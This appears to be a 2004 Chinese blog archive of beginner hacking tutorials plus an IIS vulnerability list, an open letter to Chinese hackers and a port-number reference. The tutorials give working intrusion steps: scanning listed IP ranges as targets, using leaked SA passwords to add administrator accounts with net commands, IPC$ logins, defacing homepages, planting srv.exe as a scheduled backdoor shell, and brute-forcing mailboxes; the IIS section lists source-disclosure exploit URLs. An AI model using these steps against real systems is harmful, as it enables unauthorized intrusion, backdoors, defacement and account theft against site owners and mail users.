(9)对于NET命令的功能都可以找到相应的图形工具的解决方案
(10)命令的组成 命令 参数 选项 | 参数 选项 | 参数 选项 |。。。。。。

瘰疬罗嗦说了一大堆,其实就是6和7有用,呵呵 另有两件事:
(1)在NT的NET命令中有一些参数是只有在SERVER环境中才能使用的
(2)在WIN98的NET命令中有一些参数不能在DOS-WIN中使用,只能在DOS环境中使用

下面对NET命令的不同参数的基本用法做一些初步的介绍:

(1)NET VIEW?
作用:显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式:net view [\computername | /domain[:domainname]]
参数介绍:?
<1>键入不带参数的net view显示当前域的计算机列表。
<2>\computername 指定要查看其共享资源的计算机。
<3>/domain[:domainname]指定要查看其可用计算机的域简单事例?
<1>net view \YFANG查看YFANG的共享资源列表。
<2>net view /domain:LOVE查看LOVE域中的机器列表。

(2)NET USER
作用:添加或更改用户帐号或显示用户帐号信息。该命令也可以写为 net users。
命令格式:net user [username [password | *] [options]] [/domain]
参数介绍:
<1>键入不带参数的net user查看计算机上的用户帐号列表。
<2>username添加、删除、更改或查看用户帐号名。
<3>password为用户帐号分配或更改密码。
<4>*提示输入密码。
<5>/domain在计算机主域的主域控制器中执行操作。?
简单事例:?
<1>net user yfang查看用户YFANG的信息?

(3)NET USE?
作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。

命令格式:net use [devicename | *] [\computernamesharename[volume]]?
[password | *]] [/user:[domainname]username] [[/delete] |
[/persistent:{yes | no}]]
参数介绍:
键入不带参数的net use列出网络连接。
devicename指定要连接到的资源名称或要断开的设备名称。
\computernamesharename服务器及共享资源的名称。
password访问共享资源的密码。
*提示键入密码。 /user指定进行连接的另外一个用户。
domainname指定另一个域。
username指定登录的用户名。
/home将用户连接到其宿主目录
/delete取消指定网络连接。
/persistent控制永久网络连接的使用。
简单事例:
<1>net use e: \YFANGTEMP将\YFANGTEMP目录建立为E盘
<2>net use e: \YFANGTEMP /delete断开连接

(4)NET TIME?
作用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式:net time [\computername | /domain[:name]] [/set]
参数介绍:
<1>\computername要检查或同步的服务器名。
<2>/domain[:name]指定要与其时间同步的域。
<3>/set使本计算机时钟与指定计算机或域的时钟同步。
下面的这4个参数是相关的,所以一起介绍

(5)Net Start
作用:启动服务,或显示已启动服务的列表。
命令格式:net start service

(6)Net Pause
作用:暂停正在运行的服务。
命令格式:net pause service

 

已被浏览131次 评论 (1) :: 引用(32)
流光基础教程 (4)
linlin00 于 2004年 08月14日 发表
教程四

这次我们入侵的对象是SQL主机。因为这样的主机在网络也是经常见到的!

什么是SQL:

SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间去看看SQL的联机手册,说的很明白。

SQL服务程序支持的网络协议:

Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER截获数据的危险。

IP Sockets :默认状态下开1433端口,可以被扫描器探测,存在被SNIFFER截获数据的危险。

Multi-Protocol :客户端需要支持NT RPCs,数据加密。

NWLink :存在被SNIFFER截获数据的危险。

AppleTalk (ADSP):存在被SNIFFER截获数据的危险

Banyan Vines :存在被SNIFFER截获数据的危险

在Internet上,95%以上的SQL Server 采用的都是IP Sockets协议,流光探测的就是这个协议默认的1433端口。

按CTRL+R得到下图:

 

在开始地址上填写:要扫描的IP地址
在结束地址处填写:结束IP地址

这样的话目标广一些,扫到的主机也多一些
我们这里的目标是SQL主机,当然在扫描主机类型选择:SQL

其他的不变,就用默认的吧! 不会的话看我上面的截图!
确定以后开始扫描,来听一首吧!

得到结果如图:

 

探测到的SQL主机会自动添加到MSSQL主机中,金色的头像表示有漏洞,我们能够进入!

 

看见了吗??呵呵! 下面让我们进入吧!

 

我们的先提升建立一个属于自己的用户名,并且把这个用户加到ADMIN组中去!

这里我们要用到NET命令,这个命令在我文章的附录中提到,如果不会的朋友可以先看看NET命令的用法!

或则这样连接:快捷键:CTRL+Q

 

 

这个就是我刚才扫描到的主机,就是上面图显示的那个!连接吧!用户名是SA,密码是:DCS123上面有了!

下面我要的命令是:

net user aoqixiongying /add 建立一个名叫aoqixiongying的用户名

net user aoqixiongying 123456 设置aoqixiongying的密码为:123456

net localgroup administrator aoqixiongying /add 把aoqixiongying添加到管理员组中去。

如下图所示:

 

看到了吗??下面我们要打开服务器的TELNET服务

命令NET START “TELNET”

如图:

 

这下我们就可以TELNET上去了!而且还是管理员

如图:开始-----------运行-----------telnet

 

接下来就是:open

连接到的IP地址
得到下图:

 

这里的LOGIN添入我们刚才建立的用户名,当然是我的名字aoqixiongying

PASSWPRD添入:刚才的密码123456

这里是给大家朋友演示,所以我用了我网名的拼音,呵呵! 你可千万不要用自己的名字啊,尤其是在国内主机上面,不然我们又可以见到XX地区我神勇刑警抓获一香蕉黑客,呵呵! 希望这个人不是你!

 

呵呵! 这里的C盘其实就是对方服务器的吧! 该干什么不用我再说了吧! 自己去吧!

全文完!


已被浏览121次 评论 (1) :: 引用(26)
流光基础教程 (3)
linlin00 于 2004年 08月14日 发表
教程三

这次我们要介绍的IPC$,这个功能98下是没有的! 所以请使用98系统的朋友可以跳过这篇文章,或者赶快升级到WIN2000吧!都什么年代了,还在用98?而且2000的很多NET命令也不一样!

IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用。利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。

相信很多朋友都在扫描中遇到建立空连接成功,说的也就是这个了!

下面我们就全面开始:

运行流光!首先我们的确定一下我们的目标! 因为我是斑竹,不能带大家去黑国内主机,而且我也不干这个,这次的目标就是小榴莲吧!中国台湾怎么说也是我们国家的一部分!哈哈!

IP地址:202.000.065.000 202.000.066.255 榴莲
IP地址:202.000.072.000 202.000.073.255 榴莲
IP地址:202.000.076.000 202.000.076.255 榴莲
IP地址:202.000.093.000 202.000.093.255 榴莲
IP地址:202.020.090.000 202.020.090.255 榴莲
IP地址:202.006.098.000 202.006.098.255 榴莲
IP地址:202.006.103.000 202.006.103.255 榴莲
IP地址:202.011.000.000 202.011.255.255 榴莲
IP地址:202.012.008.000 202.012.015.255 榴莲
IP地址:202.013.000.000 202.013.127.255 榴莲
IP地址:202.013.248.000 202.013.251.255 榴莲
IP地址:202.013.252.000 202.013.253.255 榴莲
IP地址:202.013.254.000 202.013.254.255 榴莲
IP地址:202.013.128.000 202.013.191.255 榴莲
IP地址:202.013.192.000 202.013.223.255 榴莲
IP地址:202.013.224.000 202.013.239.255 榴莲
IP地址:202.013.240.000 202.013.247.255 榴莲
IP地址:202.015.000.000 202.015.255.255 榴莲
IP地址:202.016.000.000 202.019.255.255 榴莲

这些就是小榴莲的地址段,大家可以随便填一段扫描了看! 不过我更喜欢用GOOGLE搜索!不知道大家的喜爱了!下面就开始吧!

选择“探测”下的“扫描POP3/FTP/NT/SQL主机”,会出现“主机扫描设置”;在“扫描范围”中分别填写“开始地址”与“结束地址”,这里我分别填入了207.188.221.1和207.188.222.225;“扫描主机类型”选择“NT/98”.

如图所示:

 

等待一会,如果你的网速够快的话,结果很快就会出来了。

 

如上图所示,IPC主机下面已经得到很多结果了,下面主机前面的颜色,我在前面已经讲过了,这里再说一次。

红色:该主机安装了FrontPage扩展。并没有权限设置。
蓝色:表示该主机上安装了FrontPage扩展。
黑色:远程执行命令。你可以单击该主机---连接,就可以用DOS命令操作远程计算机,如:dir c:
黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件,下载后来后用LC3可以解开)。
绿色:将对方SAM文件上传到指定的FTP服务器

上图中我已经得到了很多主机,榴莲真是笨啊!(其实国内的主机也好不到哪去)

下面我们开始探测IPC主机的用户了,

 

上图我已经很详细了吧! 呵呵! 不用我再多说了!来看结果吧!

 

是不是看到很多用户名字,FALLONP,Administrstor,都是超级用户,而且还有很多其他用户,如果我们不能直接探测到ADMIN的密码,我们还可以从其他用户下手,然后提升自己的权限!

下面的是引用一位朋友写的教程,因为过程都一样,所以我就不用去截图了!感谢这位朋友!

这时候我们运行win2000下的cmd.exe,打入命令:
net use \IP地址ipc$ “密码” /user: “用户名”
成功连接后显示命令成功完成

 

这时候你想干什么都可以了!哈哈! 没有看见命令成功完成吗?

如果你想黑他页面的话找到他的网页所在的目录,如:c:inetpubwwwroot ,用命令:

copy c:index.htm \IP地址c$inetpubwwwroot

这里的c:index.htm指的是你作好的网页,上传替换掉原先的文件就可以改他的主页了,如果你想进一步登陆到他的服务器,那么我们要做的是传一个telnet服务器端上去,将telnet服务打开,找到流光目录tool文件夹下的sev.exe,将它复制到你的c盘,然后用命令:

copy c:srv.exe \IP地址admin$ 意思是把本地C盘的srv.exe上传到服务器的system32目录下,我们在利

用win2000的时间计划来启动这个服务器端,首先要知道对方服务器的所在时间,用命令:

net time \IP地址

可以得到时间

 

看到了吗?? 对方的时间为2001年12月31日,上午06:36,这个时候要转换位24小时制,得到系统时间后,我们再用命令:

at \IP地址 启动telnet的时间 srv.exe

成功的话显示填加任务完成:

 

用srv.exe打开的默认端口是99,听段音乐吧!等到时间后,我们就可以用命令:

telnet IP地址 99

远程登陆到服务器上了,成功登陆后,对方服务器的c:winntsystem32目录就在你眼前了 ,下面的事情不用我再教你了吧!


已被浏览150次 评论 (0) :: 引用(41)
流光基础教程(2)
linlin00 于 2004年 08月14日 发表
教程二

看过第一篇文章的朋友,不知道你是否成功了,下面我们就直接进入流光教程的第二步了!我们这次使用的是流光破解信箱密码,但我个人认为在破解信箱方面还是溯雪比较强,只是个人意见!流光适用于暴力破解信箱密码!我们这次的目标还是21CN,呵呵!因为这是网上最常见的信箱。下面就正式开始。
1.运行流光4.5,这是目前网上的最新版本3116,其次还有流光2915,2914!
下面就开始破解了,选择POP3主机------右键------编辑------ 添加,得到如下图片:

 

这里要破解的是21CN信箱所以填上:pop.21cn.com,其他的就用默认吧!不用更改,确定就行了!

来到下一步,还是右键------------从列表中添加------选择一个字典,因为这是破解信箱,用户名大多都是中文拼音,到网上下载一个这样的字典。

 

下面我们就可以用简单模式探测了!这样速度比较快!

如果不喜欢这样破解的话,你可以使用字典,我一般喜欢用流光目录下的CHIESE.DOC这个字典! 字典添加方法如下图所示:

 

图中我是随便选择的一个字典,给大家做个示范而已!这里就已经添加好字典了!

下面就用标准模式来破解吧!好了! 这篇文章的大体内容已经写出来了!大家多实践就明白了!最后给大家附上我找到的几个信箱的POP3地址:

SINA:pop3.sina.com.cn 网易:pop.163.com KM169:email.km169.net

其实一般都在网站上会注明的。不知道大家朋友们明白了没有!


已被浏览106次 评论 (0) :: 引用(18)
流光基础教程(1)
linlin00 于 2004年 08月14日 发表
教程一

前言:教程共分为如何利用FRONTPAGE EXTENDED PRIVILEGE HOLE入侵,如何用流光破解信箱,IPC$入侵全过程,SQL入侵全过程,以及通过一些漏洞入侵系统几大部分!我将循序渐进的教大家如何入侵主机,但是请不要入侵国内主机。这次带来的是第一部分,以后讲陆续给大家补充,希望大家有所收获!
声明一点,这是给和我一样的菜鸟看的文章,高手就不用看了!下面就开始吧!
1.当然是运行我们的流光拉!我用的是流光4.5,界面如下:

 

界面不错吧!推荐在2000下使用。

2.下面开始扫描了CTRL+R键得到下图:在开始地址填上你要扫描的IP地址,如果你在最后的IP上打上1的话,那流光就会自动扫描这个IP段的255台主机,扫描主机类型依你扫描的目的不同选择也就不同,我们这里要用的是NT/98,其他的就不用管他的了,点确定就开始了!没有打过补丁的溜光不能扫国内的主机,以免一些人拿流光来干坏事!我不推荐打补丁!因为会得到很多错误的结果!

 

下面我们就可以等待一会了!看了很多人的教程,等待的时候都说抽根烟等一会,可惜我不会抽烟,只有和大家闲聊几句,(别说我是唐僧哦*_*)呵呵!这不结果出来了。看吧!是不是很多结果 :

 

主机前面的颜色,代表以下几个意思:
红色:该主机安装了FrontPage扩展。并没有权限设置。
蓝色:表示该主机上安装了FrontPage扩展
黑色:远程执行命令。你可以单击该主机---连接,就可以用DOS命令操作远程计算机,如:dir c:
黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件,下载后来后用LC3可以解开)
绿色:将对方SAM文件上传到指定的FTP服务器
这是教程的第一章,将介绍扫描到的红色主机,其他的将在下次中写到!
3.打开我们的FrontPage,然后文件-----打开站点-----如图:

 

等待几秒,因为现在正在于服务器连接,读取对方的文件。如果好了的话的到下图:

 

这个时候你就可以直接修改他的主页了!这种方法很适合刚学黑的朋友们学习!因为比较简单,所以我把他设置在第一步!希望大家都已经学会了!快去扫小榴莲的主机去啊!自己再练习一下。


已被浏览234次 评论 (1) :: 引用(88)
IIS傻瓜攻防大全 (转载)有什么问题请提出来!
linlin00 于 2004年 08月14日 发表
IIS如果运行了Index Server的话就包含了一个通过Null.htw有关的漏洞, 就是服务器上不存在此.htw结尾的文件。这个漏洞会导致显示ASP脚本的 源代码,包伙global.asa里面包含了用户名和密码等敏感信息。工具者 如果提供特殊的URL请求给IIS就可以跳出虚拟目录的限制,提供逻辑分 区和ROOT目录的访问。这个"hit-highlighting"功能在Index Server中 没有充分防止各种类型文件的请求,所以导致攻击者访问服务器上的任意 文件。Null.htw功能可以从用户输入中获得3个变量: CiWebhitsfile CiRestriction CiHiliteType

  你可以使用下面的方法传递变量来获得如default.asp的源代码:http://www.victim.com/null.htw?C ... ault.asp%20&%20 CiRestriction=none%20&%20&CiHiliteType=full
  其中不需要一个合法的.htw文件是因为虚拟文件已经存储在内存中了。

  webhits.dll & .htw

  这个hit-highligting功能是由Index Server提供的允许一个WEB用户在 文档上highlighted(突出)他们原始搜索的条目,这个文档的名字通过 变量CiWebhitsfile传递给.htw文件,Webhits.dll是一个ISAPI应用程序 来处理请求,打开文件并返回结果,当用户控制了CiWebhitsfile参数传递 给.htw时,他们就可以请求任意文件,结果就是导致查看ASP源码和其他 脚本文件内容。要了解你是否存在这个漏洞,你可以请求如下条目: http://www.victim.com/nosuchfile.htw
  如果你从服务器端获得如下信息: format of the QUERY_STRING is invalid  这就表示你存在这个漏洞。

  这个问题主要就是webhits.dll关联了.htw文件的映射,所以你只要取消 这个映射就能避免这个漏洞,你可以在你认为有漏洞的系统中搜索.htw 文件,一般会发现如下的程序:
/iissamples/issamples/oop/qfullhit.htw/iissamples/issamples/oop/
qsumrhit.htw /isssamples/exair/search/qfullhit.htw/isssamples/exair/
search/qsumrhit.htw/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用)

  一个攻击者可以使用如下的方法来访问系统中文件的内容:
http://www.victim.com/iissamples/issamples/oop/qfullhit.htw? ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full
  就会在有此漏洞系统中win.ini文件的内容。ASP Alternate Data Streams(::$DATA)

  $DATA这个漏洞是在1998年中期公布的,$DATA是在NTFS文件系统中存储 在文件里面的main data stream属性,通过建立一个特殊格式的URL,就 可能使用IIS在浏览器中访问这个data stream(数据流),这样做也就显示 了文件代码中这些data stream(数据流)和任何文件所包含的数据代码。 其中这个漏洞需要下面的几个限制,一个是要显示的这个文件需要保存在 NTFS文件分区(幸好为了"安全"好多服务器设置了NTFS格式),第二是文件 需要被ACL设置为全局可读。而且未授权用户需要知道要查看文件名的名字, WIN NT中的IIS1.0, 2.0, 3.0和4.0都存在此问题。微软提供了一个FOR IIS 3.0和4.0的版本补丁,你可以通过这文章来修补这个漏洞:

   "supporting NTFS alternate data streams by asking Windows NT to make the file name canonical"
  要查看一些.asp文件的内容,你可以请求如下的URL:
  http://www.victim.com/default.asp::$DATA你就得到了源代码。你要了解下NTFS文件系统中的数据流问题,你或许可以看看这文章: http://focus.silversand.net/newsite/skill/ntfs.txt

  ASP Dot Bug

  这个漏洞是比较早的漏洞了,是Lopht小组在1997年发现的缺陷,这个漏洞也是泄露ASP源代码给攻击者,一般在IIS3.0上存在此漏洞,在请求的URL 结尾追加一个或者多个点导致泄露ASP源代码。
  http://www.victim.com/sample.asp.

  ISM.DLL 缓冲截断漏洞

  这个漏洞是由Cerberus Information Security team.最早发现的,它运行 在IIS4.0和5.0上面,允许攻击者查看任意文件内容和源代码。通过在文件 名后面追加近230个+或者?%20?(这些表示空格)并追加?.htr?的特殊请求给IIS, 会使IIS认为客户端请求的是?.htr?文件,而.htr文件的后缀映射到ISM.DLL ISAPI应用程序,这样IIS就把这个.htr请求转交给这个DLL文件,然后ISM.DLL 程序把传递过来的文件打开和执行,但在ISM.DLL 截断信息之前,缓冲区发送 一个截断开的 .Htr 并会有一些时间去返回一些你要打开的文件内容. 除非 WEB 服务停止并重启过,否则这攻击只能有效执行一次。如果已经 发送过一个 .htr 请求到机器上,那么这攻击会失效.它只能在 ISM.DLL 第一次装入内存时工作.CNNS发现追加+号到没有一次攻击这个问题,可以进行 多次攻击。
  http://www.victim.com/global.asa ... =230)global.asa.htr

  .idc & .ida Bugs

  这个漏洞实际上类似ASP dot 漏洞,其能在IIS4.0上显示其WEB目录信息, 很奇怪的说有些还在IIS5.0上发现过此类漏洞,通过增加?idc?或者?ida? 后缀到URL会导致IIS尝试允许通过数据库连接程序.DLL来运行.IDC,如果 此.idc不存在,它就返回一些信息给客户端。
  http://www.victim.com/anything.idc 或者 anything.idq

  +.htr Bug

  这个漏洞相似由NSFOCUS发现的,对有些ASA和ASP追加+.htr的URL请求 就会导致文件源代码的泄露:http://www.victim.com/global.asa+.htr

已被浏览79次 评论 (0) :: 引用(3)
一个中国黑客致中国黑客和红客的公开信(转帖)(想学习黑客技术的进来)
linlin00 于 2004年 08月14日 发表
THURSDAY5DECEMBER2002123456789101112............一个中国黑客致中国黑客和红客的公开信

(编者注:这篇文章在很多论坛你都可以看到,由于时间长,我已经无法提供作者和来源,很抱歉)

-------------------------------------------------------------------------------------------

所有中国黑客和红客,我的同胞们:

首先声明,我的计算机软件技术、黑客功底可能不会比你们任何人差:

我通读过 MINIX,TCP/IP,BSD,LINUX,PL1的源码,我拿过中国高级程序员证书,SUN 的JAVA证书,精通VC和UNIX,对缓冲区溢出、病毒、DDK等均有研究,所以我想我有资格对你们说几句话.(如果我提到的一些计算机名词和人名,你们居然不知道,那只能证明你们的无知或者不配称为黑客.)

如果是真正的黑客,他会知道:

1.发明TCP/IP的是美国人

2. LINUX的作者,linus大侠现在也在美国工作

3. OPEN SOURCE的开创人stallman也是美国人,他提倡软件不分国界的自由的精神

4. FREE BSD的作者是美国人,他的SOURCE让真正的黑客受惠

5.世界级软件科学大师tanabaom,也是美国的客座教授,他的minix、ameba和教材教育了全世界几代黑客

提到这些,不是崇美,不是恐美,只想证明:

1.很多大师级的美国黑客,他们的理念恰恰是自由、开放、无国界的;他们的自由软件、开放源码是与政治无关的,是超越国界的,给全世界人们带来福音

2.真正的黑客精神,如stallman所说,是要让人类超越计算机,成为计算机的主宰,从而成为自由的

所有的中国黑客和红客,我的同胞们:

当你们正通过下载美国人写的黑客工具,来攻击美国网络,并且乐此不疲,以为这就是爱国行动的时候,是否想过:此时此刻,印度的软件人士,正在努力提高软件技术,他们的软件水平、软件产业已经超越了中国! 难道我们不应该痛苦地承认这个现实,并且奋起直追吗?

中国发明了火药,但是缺少研究精神,结果是被西方人研究改进了以后打中国,这样的教训还少吗??

中国向来不缺爱国热情,但是我们缺少对科技的认真研究精神和知耻而后勇的追赶精神!难道我们不愿意承认这一点吗?

从战术上来说,过早暴露自己的实力是不聪明的!冒昧地问一句,如果真的战争爆发了,您的黑客技术完全掌握好了吗,您已经为那一天的到来在进行技术储备吗?

您有没有想向那些真正为中国科技做出杰出贡献的科学家如钱学森学习呢?

所有的中国黑客和红客,我的同胞们:

请把你们的聪明才智用到真正提高你们的水平,对国家的强大有帮助的地方吧!

如果您愿意对国家有所贡献:

1.中国的863计划中有一个重点研究项目: 并行计算,分布计算,向量计算,您愿意研究它吗?

2.作为现代通讯技术的一个根本数学基础——大合数的快速因子分解,还是一个难题,您愿意研究它吗?

如果您想提高技术,对中国的软件技术有所贡献:

1.研究VC,JAVA

2.研究数据结构,去考高级程序员

3.研究操作系统,读minix source code

4.研究tcp/ip,rfc文档

5.通读linux,才算达到黑客境界

6.学习UML,ROSE,软件工程,达到系统分析员水平软件工程,达到系统分析员水平

如果您对提高中国的科技有兴趣,去研究生物基因,材料技术(纳米技术),计算机技术,航天技术……

我的同胞们,我愿大声呐喊:

一个真正的民族主义者,不是义和团,不是太平天国,不是闭关锁国,不是盲目仇外,不是不敢正视自己民族和文化的丑陋和缺点.

真正的民族主义者是成熟的、清醒的、理智的、务实的民族主义;真正的民族主义者不是种族主义者,不是极端份子,不是战争狂人. 真正的民族主义者最务实,因为他知道坚持原则,同时又懂得策略.

真正的民族主义者以追求本民族——中华民族的利益最大化为目标、准则、信念.判断一个人是不是真正的民族主义者,判断标准很简单:看他是给本民族的整体利益带来好处,还是损害民族利益.

让我们成为真正的顶尖黑客!  让我们成为真正的民族主义者!


已被浏览1751次 评论 (19) :: 引用(123)
网络端口详解,强烈建议新手们来看!!!!!!!!!!(转载)有什么问题请大家回复)
linlin00 于 2004年 08月14日 发表
看见这里n多人都在问“扫倒端口了,要怎么攻击呀?”,可是大家知道吗,并不是每一个端口都是可以用来攻击的(要不,你的机子不就成马蜂窝了),所以,我在这把各个端口的详细介绍贴出来。以供大家参考。
---------------------------------------------------------------------------------------------------------------


按端口号可分为3大类:
(1)公认端口(Well Known Ports):从0到1023,它们紧密绑定(binding)于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。
(2)注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。
(3)动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
0 通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用一种通常的闭合端口连接它时将产生不同的结果。一种典型的扫描:使用IP地址为0.0.0.0,设置ACK位并在以太网层广播。
1 tcpmux TCP Port Service Multiplexer 传输控制协议端口服务多路开关选择器
2 compressnet Management Utility   compressnet 管理实用程序
3 compressnet Compression Process   压缩进程
5 rje Remote Job Entry     远程作业登录
7 echo Echo       回显
9 discard Discard     丢弃
11 systat Active Users     在线用户
13 daytime Daytime      时间
17 qotd Quote of the Day    每日引用
18 msp Message Send Protocol    消息发送协议
19 chargen Character Generator   字符发生器
20 ftp-data File Transfer[Default Data]  文件传输协议(默认数据口) 
21 ftp File Transfer[Control]    文件传输协议(控制)
22 ssh SSH Remote Login Protocol   SSH远程登录协议 
23 telnet Telnet     终端仿真协议
24 any private mail system    预留给个人用邮件系统
25 smtp Simple Mail Transfer    简单邮件发送协议
27 nsw-fe NSW User System FE    NSW 用户系统现场工程师
29 msg-icp MSG ICP      MSG ICP
31 msg-auth MSG Authentication   MSG验证
33 dsp Display Support Protocol   显示支持协议
35 any private printer server   预留给个人打印机服务
37 time Time       时间
38 rap Route Access Protocol    路由访问协议
39 rlp Resource Location Protocol   资源定位协议
41 graphics Graphics     图形
42 nameserver WINS Host Name Server   WINS 主机名服务
43 nicname Who Is     "绰号" who is服务
44 mpm-flags MPM FLAGS Protocol   MPM(消息处理模块)标志协议
45 mpm Message Processing Module [recv]  消息处理模块 
46 mpm-snd MPM [default send]    消息处理模块(默认发送口)
47 ni-ftp NI FTP     NI FTP
48 auditd Digital Audit Daemon   数码音频后台服务49 tacacs Login Host Protocol (TACACS)  TACACS登录主机协议50 re-mail-ck Remote Mail Checking Protocol  远程邮件检查协议[未结束]
51 la-maint IMP Logical Address Maintenance  IMP(接口信息处理机)逻辑地址维护
52 xns-time XNS Time Protocol    施乐网络服务系统时间协议
53 domain Domain Name Server    域名服务器
54 xns-ch XNS Clearinghouse     施乐网络服务系统票据交换 55 isi-gl ISI Graphics Language   ISI图形语言
56 xns-auth XNS Authentication   施乐网络服务系统验证
57 ? any private terminal access   预留个人用终端访问
58 xns-mail XNS Mail     施乐网络服务系统邮件
59 any private file service    预留个人文件服务
60 Unassigned      未定义
61 ni-mail NI MAIL      NI邮件?
62 acas ACA Services     异步通讯适配器服务
63 whois+ whois+      WHOIS+
64 covia Communications Integrator (CI)  通讯接口 
65 tacacs-ds TACACS-Database Service   TACACS数据库服务
66 sql*net Oracle SQL*NET    Oracle SQL*NET
67 bootps Bootstrap Protocol Server   引导程序协议服务端
68 bootpc Bootstrap Protocol Client   引导程序协议客户端
69 tftp Trivial File Transfer    小型文件传输协议
70 gopher Gopher     信息检索协议
71 netrjs-1 Remote Job Service   远程作业服务
72 netrjs-2 Remote Job Service   远程作业服务
73 netrjs-3 Remote Job Service   远程作业服务
74 netrjs-4 Remote Job Service   远程作业服务
75 any private dial out service   预留给个人拨出服务
76 deos Distributed External Object Store 分布式外部对象存储 
77 any private RJE service     预留给个人远程作业输入服务
78 vettcp vettcp     修正TCP?
79 finger Finger     查询远程主机在线用户等信息
80 http World Wide Web HTTP     全球信息网超文本传输协议 81 hosts2-ns HOSTS2 Name Server   HOST2名称服务
82 xfer XFER Utility     传输实用程序
83 mit-ml-dev MIT ML Device     模块化智能终端ML设备
84 ctf Common Trace Facility    公用追踪设备
85 mit-ml-dev MIT ML Device     模块化智能终端ML设备
86 mfcobol Micro Focus Cobol    Micro Focus Cobol编程语言
87 any private terminal link   预留给个人终端连接
88 kerberos Kerberos     Kerberros安全认证系统
89 su-mit-tg SU/MIT Telnet Gateway   SU/MIT终端仿真网关
90 dnsix DNSIX Securit Attribute Token Map  DNSIX 安全属性标记图
91 mit-dov MIT Dover Spooler    MIT Dover假脱机
92 npp Network Printing Protocol   网络打印协议
93 dcp Device Control Protocol   设备控制协议
94 objcall Tivoli Object Dispatcher   Tivoli对象调度
95 supdup  SUPDUP    
96 dixie DIXIE Protocol Specification   DIXIE协议规范
97 swift-rvf(Swift Remote Virtural File Protocol)快速远程虚拟文件协议98 tacnews TAC News      TAC新闻协议
99 metagram Metagram Relay    
100 newacct [unauthorized use]
101=NIC Host Name Server
102=ISO-TSAP
103=Genesis Point-to-Point Trans Net
104=ACR-NEMA Digital Imag. & Comm. 300
105=Mailbox Name Nameserver
106=3COM-TSMUX3com-tsmux
107=Remote Telnet Service
108=SNA Gateway Access Server
109=Post Office Protocol - Version 2
110=Post Office Protocol - Version 3
111=SUN RPC
112=McIDAS Data Transmission Protocol
113=Authentication Service
114=Audio News Multicast
115=Simple File Transfer Protocol
116=ANSA REX Notify
117=UUCP Path Service
118=SQL Servicessqlserv
119=Network News Transfer Protocol
120=CFDPTKTcfdptkt
121=Encore Expedited Remote Pro.Call
122=SMAKYNETsmakynet
123=Network Time Protocol
124=ANSA REX Trader
125=Locus PC-Interface Net Map Ser
126=Unisys Unitary Login
127=Locus PC-Interface Conn Server
128=GSS X License Verification
129=Password Generator Protocol
130=cisco FNATIVE
131=cisco TNATIVE
132=cisco SYSMAINT
133=Statistics Service
134=INGRES-NET Service
135=Location Service
136=PROFILE Naming System
137=NETBIOS Name Service
138=NETBIOS Datagram Service
139=NETBIOS Session Service
140=EMFIS Data Service
141=EMFIS Control Service
142=Britton-Lee IDM
143=Interim Mail Access Protocol v2
144=NewSnews
145=UAAC Protocoluaac
146=ISO-IP0iso-tp0
147=ISO-IPiso-ip
148=CRONUS-SUPPORT
149=AED 512 Emulation Service
150=SQL-NETsql-net
151=HEMShems
152=Background File Transfer Program
153=SGMPsgmp
154=NETSCnetsc-prod
155=NETSCnetsc-dev
156=SQL Service
157=KNET/VM Command/Message Protocol
158=PCMail Serverpcmail-srv
159=NSS-Routingnss-routing
160=SGMP-TRAPSsgmp-traps
161=SNMP
162=SNMP TRAP
163=CMIP/TCP Manager
164=CMIP/TCP Agent
165=Xeroxxns-courier
166=Sirius Systems
167=NAMPnamp
168=RSVDrsvd
169=Send
170=Network PostScript
170=Network PostScript
171=Network Innovations Multiplex
172=Network Innovations CL/1
173=Xyplexxyplex-mux
174=MAILQ
175=VMNET
176=GENRAD-MUXgenrad-mux
177=X Display Manager Control Protocol
178=NextStep Window Server
179=Border Gateway Protocol
180=Intergraphris
181=Unifyunify
182=Unisys Audit SITP
183=OCBinderocbinder
184=OCServerocserver
185=Remote-KIS
186=KIS Protocolkis
187=Application Communication Interface
188=Plus Five
401=Uninterruptible Power Supply
402=Genie Protocol
403=decapdecap
404=ncednced
405=ncldncld
406=Interactive Mail Support Protocol
407=Timbuktutimbuktu
408=Prospero Resource Manager Sys. Man.
409=Prospero Resource Manager Node Man.
410=DECLadebug Remote Debug Protocol
411=Remote MT Protocol
412=Trap Convention Port
413=SMSPsmsp
414=InfoSeekinfoseek
415=BNetbnet
416=Silverplattersilverplatter
417=Onmuxonmux
418=Hyper-Ghyper-g
419=Arielariel1
420=SMPTEsmpte
421=Arielariel2
422=Arielariel3
423=IBM Operations Planning and Control Start
424=IBM Operations Planning and Control Track
425=ICADicad-el
426=smartsdpsmartsdp
427=Server Location
429=OCS_AMU
430=UTMPSDutmpsd
431=UTMPCDutmpcd
432=IASDiasd
433=NNSPnnsp
434=MobileIP-Agent
435=MobilIP-MN
436=DNA-CMLdna-cml
437=comscmcomscm
439=dasp, Thomas Obermair
440=sgcpsgcp
441=decvms-sysmgtdecvms-sysmgt
442=cvc_hostdcvc_hostd
443=https
444=Simple Network Paging Protocol
445=Microsoft-DS
446=DDM-RDBddm-rdb
447=DDM-RFMddm-dfm
448=DDM-BYTEddm-byte
449=AS Server Mapper
450=TServertserver
512=exec, Remote process execution
513=login, remote login
514=cmd, exec with auto auth.
514=syslog
515=Printer spooler
516=Unassigned
517=talk
519=unixtime
520=extended file name server
521=Unassigned
522=Unassigned
